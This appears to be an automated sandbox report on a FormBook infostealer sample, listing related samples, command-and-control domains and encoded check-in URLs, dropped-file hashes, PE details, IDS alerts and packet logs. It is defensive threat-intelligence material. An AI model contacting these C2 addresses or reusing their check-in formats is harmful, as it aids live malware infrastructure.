176.57.65.76	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/fpja/?cNPH=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&EtJTX=_JVX4ryxDRQpLJF
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/fpja/?9F=IUuWDP5KSR42idQ8XdSlo3kXCFzmA+zBaCctSylP56Crxmno30P/P9QjtU4p0BAyo+b46pZB1tLFie03XqTXcxME3uJuUkrEHMOi0EZXDVBAbjQv6uRKQsMrbusrwUvwXjFI0Eut13DQ&wtE0B=1LjxZz
	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	www.newbh.pro/z9pt/
136.243.225.5	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.myfastuploader.sbs/y3ui/
194.245.148.189	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.did-ready.info/89qa/
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	www.wine-drinkers.club/hakt/
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/ib68/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/dvmh/?F4=Q0yHy&xP7x=oFIEYIO2gjvnF7MstK6lKHEue9aF/tlAMWbI9WLDgwNy2jujsZOasn0dsRYzh1BdbVLS+4ZlfSYhPFaSDYrrMgKpzoJ2CbempAqVOW6SbKF8YFlZ5FonZlU=
	PAYMENT_ADVICE.exe	Get hash	malicious	FormBook	Browse	www.wine-drinkers.club/hakt/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/dvmh/
	Project Breakdown Doc.exe	Get hash	malicious	FormBook	Browse	www.wine-drinkers.club/hakt/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.maitreyatoys.world/dvmh/
	Jjfmcz1Hsz.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.apidachicago.org/nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX
	Aposporogony.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.apidachicago.org/nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jD
209.74.79.40	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.unlimitu.website/bhgd/
	rQuotation.exe	Get hash	malicious	FormBook	Browse	www.yous.website/sd58/?4v7=qfAN8teQqWHl0pB75/wJ4PX285H5E3s25CgjwOd4PKd8zFqJMRX78aaJW2P6tpRkk2pp9lWkT1iA/dTcpEbuyLhsAas7SiW6kXoDkzQ8RaPJjUuFvtCyEK8=&pRel=chN0
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	www.unlimitu.website/b4eq/
	CJE003889.exe	Get hash	malicious	FormBook	Browse	www.balanpoint.life/0cbv/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.deadshoy.tech	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	199.59.243.228
	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
www.did-ready.info	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
www.did-ready.info	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
www.newbh.pro	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	88.198.8.150
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	88.198.8.150
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	144.76.229.203
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	78.47.94.125
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	95.217.25.228
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	95.217.25.228
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	195.201.57.90
CSLDE	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
	miori.arm.elf	Get hash	malicious	Unknown	Browse	194.245.229.87
	sh4.elf	Get hash	malicious	Mirai	Browse	194.245.229.64
	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	194.245.230.66
	nabmips.elf	Get hash	malicious	Unknown	Browse	159.25.86.139
	nshkmpsl.elf	Get hash	malicious	Mirai	Browse	194.245.230.82
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	194.245.148.189
TELINEABA	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	J1VpshZJfm.exe	Get hash	malicious	FormBook	Browse	176.57.65.76
	belks.arm.elf	Get hash	malicious	Mirai	Browse	88.214.61.247
	belks.mpsl.elf	Get hash	malicious	Mirai	Browse	88.214.61.239
	na.elf	Get hash	malicious	Mirai	Browse	88.214.61.214
	ImBm40hNZ2.exe	Get hash	malicious	FormBook, GuLoader	Browse	176.57.64.102
	220204-TF1--00.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	20-EM-00- PI-INQ-3001.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
	RFQ STR-160-01.exe	Get hash	malicious	FormBook	Browse	176.57.64.102
MULTIBAND-NEWHOPEUS	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	209.74.77.109
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	XeFYBYYj0w.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	209.74.77.107

Process:	C:\Users\user\Desktop\SLq0ulC3Wf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380285623575084
Encrypted:	false
SSDEEP:	48:+WSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:+LHxvCsIfA2KRHmOugw1s
MD5:	3DE8C237AE45317874CDD4A22928CCED
SHA1:	5FDA59AE6DF07FE8DDAA0D3FDC17D78752C9955A
SHA-256:	C7784FBFD2FC129A8F16665768CA3C17B9BCF080FFD48516E826A6B18F629A06
SHA-512:	BC5397E31BE411D3154A61F270B23B51DF7F7E3812255D5F64CD16E0E62DA4C51BEDE994915055F65F49977D282BF0A5F9C66E0AD8CE869137606B703CC0E042
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\-631756

Download File

Process:	C:\Windows\SysWOW64\DpiScaling.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4b1mi4g.cux.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3njuscn.ocr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vblqtist.oon.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zidf0pbr.cje.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7343098633504646
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	SLq0ulC3Wf.exe
File size:	836'608 bytes
MD5:	f8048121980af794fbe2e41741244055
SHA1:	4785f7e68464cde2eafeec459f437e7e422ab47a
SHA256:	2a39456047c17169357a4065aaae2dace49a63d160633f59c9049f6eabc9cc4f
SHA512:	6ace0b52ea0291023b91b73d29d41198cde3ca13e9a32b6a6b636e48267e5e060e550625f51e0efca5d5f7f596c513d375d806e1eae77a71dbdc05fe1c121d28
SSDEEP:	12288:DHR9b4YbiwyF1l4rjVWIp7Qhd4C37XzRehA260T9j+ivYWIDWSo0AwfaSQtdZqqN:jX/3fVWGhC3RehAPQwfKDqqcDYZ
TLSH:	4E0502340F45D406C95D9A300A72F2FA1BB89E97F501D71A9FDA7EFBBD26E0608184D2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jkg..............0.............v.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4cd876
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676B6ACE [Wed Dec 25 02:15:42 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007F39B10BFB12h
je 00007F39B10BFB12h
add byte ptr [ebp+00h], ch
add byte ptr [edx+00h], dl
add byte ptr [esi+00h], ah
insb
add byte ptr [ebp+00h], ah
arpl word ptr [eax], ax
je 00007F39B10BFB12h
imul eax, dword ptr [eax], 006E006Fh
add byte ptr [ecx+00h], al
jnc 00007F39B10BFB12h
jnc 00007F39B10BFB12h
add byte ptr [ebp+00h], ch
bound eax, dword ptr [eax]
insb
add byte ptr [ecx+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
add byte ptr [edi+00h], ch
popad
add byte ptr [eax+eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcd824	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x51c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcb8bc	0xcba00	5d1c1fd2cd636d6ff5b32604bd1d7f98	False	0.8941739564149785	data	7.742139224831791	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x51c	0x600	dfd2e149d7b83c91f31312d2d6176596	False	0.3580729166666667	data	2.927511966456535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	6e97fe1e7e0fa9008eaba4db9088118a	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xce058	0x4c0	data			0.421875

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T05:35:39.706183+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49714	176.57.65.76	80	TCP
2025-01-11T05:35:42.276868+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49715	176.57.65.76	80	TCP
2025-01-11T05:35:44.941736+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49716	176.57.65.76	80	TCP
2025-01-11T05:35:52.987839+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49718	199.59.243.228	80	TCP
2025-01-11T05:35:55.549880+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49720	199.59.243.228	80	TCP
2025-01-11T05:35:58.237986+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49722	199.59.243.228	80	TCP
2025-01-11T05:36:14.626815+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49724	209.74.79.40	80	TCP
2025-01-11T05:36:17.160655+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49725	209.74.79.40	80	TCP
2025-01-11T05:36:19.716227+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49726	209.74.79.40	80	TCP
2025-01-11T05:36:27.981919+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49728	136.243.225.5	80	TCP
2025-01-11T05:36:30.512696+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49729	136.243.225.5	80	TCP
2025-01-11T05:36:33.058587+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49730	136.243.225.5	80	TCP
2025-01-11T05:36:41.522782+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49732	185.68.108.243	80	TCP
2025-01-11T05:36:44.765305+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49733	185.68.108.243	80	TCP
2025-01-11T05:36:47.297564+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.8	49734	185.68.108.243	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:35:23.262387037 CET	49712	80	192.168.2.8	194.245.148.189
Jan 11, 2025 05:35:23.267355919 CET	80	49712	194.245.148.189	192.168.2.8
Jan 11, 2025 05:35:23.267467976 CET	49712	80	192.168.2.8	194.245.148.189
Jan 11, 2025 05:35:23.278686047 CET	49712	80	192.168.2.8	194.245.148.189
Jan 11, 2025 05:35:23.283488989 CET	80	49712	194.245.148.189	192.168.2.8
Jan 11, 2025 05:35:23.889981031 CET	80	49712	194.245.148.189	192.168.2.8
Jan 11, 2025 05:35:23.889998913 CET	80	49712	194.245.148.189	192.168.2.8
Jan 11, 2025 05:35:23.890011072 CET	80	49712	194.245.148.189	192.168.2.8
Jan 11, 2025 05:35:23.890187025 CET	49712	80	192.168.2.8	194.245.148.189
Jan 11, 2025 05:35:23.893434048 CET	49712	80	192.168.2.8	194.245.148.189
Jan 11, 2025 05:35:23.898178101 CET	80	49712	194.245.148.189	192.168.2.8
Jan 11, 2025 05:35:39.050806046 CET	49714	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:39.055661917 CET	80	49714	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:39.055768013 CET	49714	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:39.072053909 CET	49714	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:39.076970100 CET	80	49714	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:39.705981016 CET	80	49714	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:39.706007957 CET	80	49714	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:39.706046104 CET	80	49714	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:39.706182957 CET	49714	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:40.588624001 CET	49714	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:41.607259035 CET	49715	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:41.612155914 CET	80	49715	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:41.612245083 CET	49715	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:41.628901005 CET	49715	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:41.633812904 CET	80	49715	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:42.276772022 CET	80	49715	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:42.276788950 CET	80	49715	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:42.276797056 CET	80	49715	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:42.276868105 CET	49715	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:42.276907921 CET	49715	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:43.135322094 CET	49715	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:44.153961897 CET	49716	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:44.159198046 CET	80	49716	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:44.159339905 CET	49716	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:44.175172091 CET	49716	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:44.180351973 CET	80	49716	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:44.180496931 CET	80	49716	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:44.941660881 CET	80	49716	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:44.941674948 CET	80	49716	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:44.941735983 CET	49716	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:44.941957951 CET	80	49716	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:44.942079067 CET	49716	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:45.682153940 CET	49716	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:46.700978994 CET	49717	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:46.705777884 CET	80	49717	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:46.705851078 CET	49717	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:46.716240883 CET	49717	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:46.721084118 CET	80	49717	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:47.375411034 CET	80	49717	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:47.375422955 CET	80	49717	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:47.375579119 CET	49717	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:47.376435995 CET	80	49717	176.57.65.76	192.168.2.8
Jan 11, 2025 05:35:47.376637936 CET	49717	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:47.378408909 CET	49717	80	192.168.2.8	176.57.65.76
Jan 11, 2025 05:35:47.383585930 CET	80	49717	176.57.65.76	192.168.2.8
